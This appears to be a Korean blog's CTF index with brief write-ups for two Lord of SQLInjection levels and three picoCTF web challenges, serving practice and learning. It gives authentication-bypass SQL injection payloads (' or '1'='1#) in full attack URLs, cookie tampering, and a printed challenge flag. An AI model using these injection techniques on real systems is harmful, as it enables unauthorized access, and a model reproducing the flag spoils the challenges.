본문 바로가기

Study/CTF11

Lord of SQLInjection: cobolt ProblemSolve기존 구문 → GET 방식, id = adminselect id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')”변경 구문select id from prob_cobolt where id='admin' or '1'='1# and pw=md5('')”공격 구문https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin' or '1'='1# 2025. 1. 21.
Lord of SQLInjection: gremlin ProblemSolve기존 구문 → GET 방식select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}’ 변경 구문select id from prob_gremlin where id='admin' and pw='admin' or '1'='1#’ 공격 구문https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=admin&pw=admin' or '1'='1 2025. 1. 21.
picoCTF: Insp3ct0r(Web) Problemhint 1 : How do you inspect web code on a browser? hint 2 : There's 3 partsSolution 1. 문제 링크 접속 2. “How”를 살펴보면 HTML, CSS, JS(JavaScript)로 사이트가 구성됨을 알 수 있음 3. 개발자 도구에서 “Source”의 HTML 코드를 보면 첫 번째 flag 값 조각 발견 4. JS 코드를 보면 세 번째 flag 값 조각 발견 5. CSS 코드를 보면 번째 flag 값 조각 발견 6. flag : picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?832b0699} 결론소스 코드 분석으로 문제 해결 2024. 11. 9.
picoCTF: Cookies(Web) Problem hint 1 : NoneSolution 1. 문제 링크 접속 2. “snickerdoodle” 검색 3. cookie 값이 0임을 확인 4. cookie 값을 1부터 변경 시도 5. cookie 값이 18일 때 flag 얻음 6. cookie 값이 29부터는 없음을 확인결론쿠키 값 변조로 문제 해결 2024. 11. 9.
picoCTF: GET aHEAD(Web) Problemhint 1 : Maybe you have more than 2 choices hint 2 : Check out tools like Burpsuite to modify your requests and look at the responses Solution 1. 문제 링크 접속 2. proxy 잡고, “Choose Red” 클릭(아무거나 클릭해도 무방한 듯) 3. Repeater로 보냄 4. “GET” method → “HEAD” method로 변경하여 보내면 flag 획득결론Method 변경으로 문제 해결 2024. 7. 8.